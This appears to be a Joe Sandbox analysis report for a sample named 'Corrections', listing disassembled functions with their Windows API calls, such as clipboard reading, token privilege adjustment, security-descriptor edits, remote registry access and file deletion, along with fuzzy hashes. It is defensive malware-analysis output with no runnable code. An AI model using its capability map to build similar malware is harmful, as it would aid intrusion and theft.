Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 92b124a1c455268a562d1933f0979e8232ad9060ed5ba54e329c3896b546d000
Instruction ID: 176fc85927970bcd658a0d92f684238469218bcce287628e220d68aa47ec3fa8
Opcode Fuzzy Hash: 92b124a1c455268a562d1933f0979e8232ad9060ed5ba54e329c3896b546d000
Instruction Fuzzy Hash: 5AF0A7B09143189FE752DF24DC45BD57FBCA701B0CF0000A5A24496181D7B44B88CF41

Function 00923A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00923A76

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 672797bd8ef73266b0d726915e80c7484bda182ded44910ed02805ca6c3bd9b0
Instruction ID: f39c387a9e9d60163abf42d14dbdfc1bd7cb26b6c619121b4b123a2c3b7fd9e1
Opcode Fuzzy Hash: 672797bd8ef73266b0d726915e80c7484bda182ded44910ed02805ca6c3bd9b0
Instruction Fuzzy Hash: 8EE0C276A012245BCB20A358AC06FEA77EDDFC87A0F0441B1FC09D7258E960ED809690

Function 0096071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00960A84,?,?,00000000,?,00960A84,00000000,0000000C), ref: 00960737

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: df8206d27078d499816dda11a77fdd72533e087786e804d7700777c6e0ae0806
Instruction ID: 53285818c5cbaeaafee899bc7b202f13b7bf105e761ab67904de99c8fe64d45e
Opcode Fuzzy Hash: df8206d27078d499816dda11a77fdd72533e087786e804d7700777c6e0ae0806
Instruction Fuzzy Hash: 05D06C3201410DBBDF028F84DD06EDA3BAAFB48714F014100FE1866020C732E821AB90

Function 0098EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8220331e3b29279941b1d62ff5f2c0cd690a2a1b19224c95e9827b56417607ea
Instruction ID: ac50cff6d9c38813db5245b30373f7c42753fb55dfed3138e4ad3c562e831d3d
Opcode Fuzzy Hash: 8220331e3b29279941b1d62ff5f2c0cd690a2a1b19224c95e9827b56417607ea
Instruction Fuzzy Hash: 0AB0922801560005AD2C6A385A29999330C7842BB57DC1BC0E479852E1D339880FBA90

Function 0099664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0098DC54: FindFirstFileW.KERNEL32(?,?), ref: 0098DCCB
Part of subcall function 0098DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0098DD1B
Part of subcall function 0098DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0098DD2C
Part of subcall function 0098DC54: FindClose.KERNEL32(00000000), ref: 0098DD43

GetLastError.KERNEL32 ref: 0099666E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 53226b7f99107e373459ae0b34cb0002dd220ecfd6c889ed59a28666fbab9589
Instruction ID: 42ee0b4f851f1b9b15a2cbeeba2a34f5b72a0c0c9116a0adc8d1d0ecb288e018
Opcode Fuzzy Hash: 53226b7f99107e373459ae0b34cb0002dd220ecfd6c889ed59a28666fbab9589
Instruction Fuzzy Hash: D1F08C362002109FCB10EF58E845B6EB7E9BF88320F048419F9499B352CB70BC01CB90

Non-executed Functions

Function 00981B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00982010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098205A
Part of subcall function 00982010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00982087
Part of subcall function 00982010: GetLastError.KERNEL32 ref: 00982097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00981BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00981BF4
CloseHandle.KERNEL32(?), ref: 00981C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00981C1D
GetProcessWindowStation.USER32 ref: 00981C36
SetProcessWindowStation.USER32(00000000), ref: 00981C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00981C5C

Part of subcall function 00981A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00981B48), ref: 00981A20
Part of subcall function 00981A0B: CloseHandle.KERNEL32(?,?,00981B48), ref: 00981A35

Strings

, xrefs: 00981BA6
default, xrefs: 00981C57
winsta0, xrefs: 00981C18

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 1f3e6db6101a9680ba7dfdfe399db2a7e24a51b6560c30cdbf0ecbda71d1af48
Instruction ID: fda931f57e41b1cf8dd02e93d1d0ecfde965cd8688d3f2519b60f5d5a77689b4
Opcode Fuzzy Hash: 1f3e6db6101a9680ba7dfdfe399db2a7e24a51b6560c30cdbf0ecbda71d1af48
Instruction Fuzzy Hash: 7A819AB1904209AFDF11AFA4DD49FEE7BBCFF48314F144129F914A62A0E7318946DB60

Function 009814AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00981A60
Part of subcall function 00981A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A6C
Part of subcall function 00981A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A7B
Part of subcall function 00981A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A82
Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00981A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00981518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0098154C
GetLengthSid.ADVAPI32(?), ref: 00981563
GetAce.ADVAPI32(?,00000000,?), ref: 0098159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009815B9
GetLengthSid.ADVAPI32(?), ref: 009815D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 009815D8
HeapAlloc.KERNEL32(00000000), ref: 009815DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00981600
CopySid.ADVAPI32(00000000), ref: 00981607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00981636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00981658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0098166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00981691
HeapFree.KERNEL32(00000000), ref: 00981698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009816A1
HeapFree.KERNEL32(00000000), ref: 009816A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009816B1
HeapFree.KERNEL32(00000000), ref: 009816B8
GetProcessHeap.KERNEL32(00000000,?), ref: 009816C4
HeapFree.KERNEL32(00000000), ref: 009816CB

Part of subcall function 00981ADF: GetProcessHeap.KERNEL32(00000008,009814FD,?,00000000,?,009814FD,?), ref: 00981AED
Part of subcall function 00981ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009814FD,?), ref: 00981AF4
Part of subcall function 00981ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009814FD,?), ref: 00981B03

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: ecdb36a99348aba206067589c42ee63d5fa9cbb12c5860cb849f78849bc2f754
Instruction ID: 353a97874a2e17944969b4c3056b9954feb2a079276d265006ac111f87242da0
Opcode Fuzzy Hash: ecdb36a99348aba206067589c42ee63d5fa9cbb12c5860cb849f78849bc2f754
Instruction Fuzzy Hash: 1E715DB290520AABDF10EFA5DD44FAEBBBCBF04350F084615F955A7290E7319906CBA0

Function 0099F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(009BDCD0), ref: 0099F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 0099F594
GetClipboardData.USER32(0000000D), ref: 0099F5A0
CloseClipboard.USER32 ref: 0099F5AC
GlobalLock.KERNEL32(00000000), ref: 0099F5E4
CloseClipboard.USER32 ref: 0099F5EE
GlobalUnlock.KERNEL32(00000000), ref: 0099F619
IsClipboardFormatAvailable.USER32(00000001), ref: 0099F626
GetClipboardData.USER32(00000001), ref: 0099F62E
GlobalLock.KERNEL32(00000000), ref: 0099F63F
GlobalUnlock.KERNEL32(00000000), ref: 0099F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 0099F695
GetClipboardData.USER32(0000000F), ref: 0099F6A1
GlobalLock.KERNEL32(00000000), ref: 0099F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0099F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0099F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0099F72F
GlobalUnlock.KERNEL32(00000000), ref: 0099F750
CountClipboardFormats.USER32 ref: 0099F771
CloseClipboard.USER32 ref: 0099F7B6

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 07f6b4dd2b3ae6ab62ea9638a0dace80d8f4baf9e4af2050396c2f02f4e25f14
Instruction ID: 880d86a144dc94f5f5bbee75cbd51ac9b81506b6bd919c88503a135b38ac789f
Opcode Fuzzy Hash: 07f6b4dd2b3ae6ab62ea9638a0dace80d8f4baf9e4af2050396c2f02f4e25f14
Instruction Fuzzy Hash: 4D61D035209301AFD700EF28E994F6AB7A8EF84714F14456CF456C72A2EB31ED45DB62

Function 009973D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00997403
FindClose.KERNEL32(00000000), ref: 00997457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00997493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009974BA

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 009974F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00997524

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00997577
%02d, xrefs: 00997645, 0099764F, 0099769F, 009976EF, 0099773F, 0099778F
%03d, xrefs: 009977E7
%4d, xrefs: 009975F6
%4d%02d%02d%02d%02d%02d, xrefs: 009975AF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 0b3491a244d428431299a8d049fd5412fff21ee16958a53b746b32826e8820ff
Instruction ID: cdf417b357ba3ff3ae055116942689362afed882aa1bcc844a6dcedd034283c9
Opcode Fuzzy Hash: 0b3491a244d428431299a8d049fd5412fff21ee16958a53b746b32826e8820ff
Instruction Fuzzy Hash: 01D171B2508354AFC710EBA4D885EAFB7ECAFC8704F44091DF585D6292EB74DA44CB62

Function 0099A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099A0A8
GetFileAttributesW.KERNEL32(?), ref: 0099A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 0099A100
FindNextFileW.KERNEL32(00000000,?), ref: 0099A118
FindClose.KERNEL32(00000000), ref: 0099A123
FindFirstFileW.KERNEL32(*.*,?), ref: 0099A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 0099A18F
SetCurrentDirectoryW.KERNEL32(009E7B94), ref: 0099A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 0099A1B7
FindClose.KERNEL32(00000000), ref: 0099A1C4
FindClose.KERNEL32(00000000), ref: 0099A1D4

Strings

*.*, xrefs: 0099A13A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: a7b1a65e9480a62bef853606550105f7dc91d240091e256554cd6a14e8b721fd
Instruction ID: dd27342c324953c0904f7231556b3d4486b3cf722750a5049bd77855c0d8f1d1
Opcode Fuzzy Hash: a7b1a65e9480a62bef853606550105f7dc91d240091e256554cd6a14e8b721fd
Instruction Fuzzy Hash: AF3115316092496BDF24AFB8DC49EEE77ACDF45334F040261F814E2090EB74DE418AA1

Function 00994763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00994785
_wcslen.LIBCMT ref: 009947B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 009947E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00994803
RemoveDirectoryW.KERNEL32(?), ref: 00994813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0099489A
CloseHandle.KERNEL32(00000000), ref: 009948A5
CloseHandle.KERNEL32(00000000), ref: 009948B0

Strings

\??\%s, xrefs: 009947A0
\, xrefs: 009947BC
:, xrefs: 009947C7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: a2e1334eb850bd1c73c6576f832cd8325aa597cfad138b83e5a97bd7ef2fd8ce
Instruction ID: 82b37b9500c147a34cbdcd0b0ff3ca4c60814d93dfa7837aef60788cb6f6ec8b
Opcode Fuzzy Hash: a2e1334eb850bd1c73c6576f832cd8325aa597cfad138b83e5a97bd7ef2fd8ce
Instruction Fuzzy Hash: 4031E37191424AABDF219FA4DC49FEF37BCEF89714F1041B6F609D2060EB7496858B24

Function 0099A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099A203
FindNextFileW.KERNEL32(00000000,?), ref: 0099A25E
FindClose.KERNEL32(00000000), ref: 0099A269
FindFirstFileW.KERNEL32(*.*,?), ref: 0099A285
SetCurrentDirectoryW.KERNEL32(?), ref: 0099A2D5
SetCurrentDirectoryW.KERNEL32(009E7B94), ref: 0099A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 0099A2FD
FindClose.KERNEL32(00000000), ref: 0099A30A
FindClose.KERNEL32(00000000), ref: 0099A31A

Part of subcall function 0098E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0098E3B4

Strings

*.*, xrefs: 0099A280

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: be067af6609a7373adee8c5ec0e5abd14ab9ec49b91fcb85e363fa02b2cfbfd8
Instruction ID: 4f096f6441bf6e34797ab19aa7dfb825e83db918388905c83224fe7281c9cd89
Opcode Fuzzy Hash: be067af6609a7373adee8c5ec0e5abd14ab9ec49b91fcb85e363fa02b2cfbfd8
Instruction Fuzzy Hash: 3F3104315052596FCF10AFA9EC09EEE77ACDF85338F1442A1F820A3091EB31DE85CA95

Function 009AC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 009ACA09
RegCloseKey.ADVAPI32(00000000), ref: 009ACA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009ACA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009ACB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 009ACBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 009ACC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 009ACC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 009ACD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 009ACDE2
RegCloseKey.ADVAPI32(00000000), ref: 009ACDEF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 18880a43e6e1af71d6fda5bcd124483f825aee152e5a6abc2649210a1fc555b3
Instruction ID: 8e52545c2fc05c3791604bfaad47b7dda8f7e9bd332111233dbf5c12e4351ac7
Opcode Fuzzy Hash: 18880a43e6e1af71d6fda5bcd124483f825aee152e5a6abc2649210a1fc555b3
Instruction Fuzzy Hash: 41024EB1604200AFC714DF24C895E2ABBE5EF89314F18849DF849DF2A6DB31ED42CB91

Function 0098D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871

Part of subcall function 0098EAB0: GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0098D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0098DA88
MoveFileW.KERNEL32(?,?), ref: 0098DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 0098DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 0098DAE2

Part of subcall function 0098DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0098DAC7,?,?), ref: 0098DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 0098DAFE
FindClose.KERNEL32(00000000), ref: 0098DB0F

Strings

\*.*, xrefs: 0098D978, 0098D981, 0098D996

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 919e647a211b2cff38d91ae9b677e0f7cb1439907598d460209c52d14f379cd6
Instruction ID: 9869a2b7fcd63024cc527f74bddf64eac33a02780be858619ece46bc2f0f03dc
Opcode Fuzzy Hash: 919e647a211b2cff38d91ae9b677e0f7cb1439907598d460209c52d14f379cd6
Instruction Fuzzy Hash: 1C617F7180615DAFCF05FBE0DA92AEDB7B9AF54300F2041A5E406B7295EB316F09DB60

Function 0099F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0099F7EE
EmptyClipboard.USER32 ref: 0099F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 0099F809
CloseClipboard.USER32 ref: 0099F900

Memory Dump Source

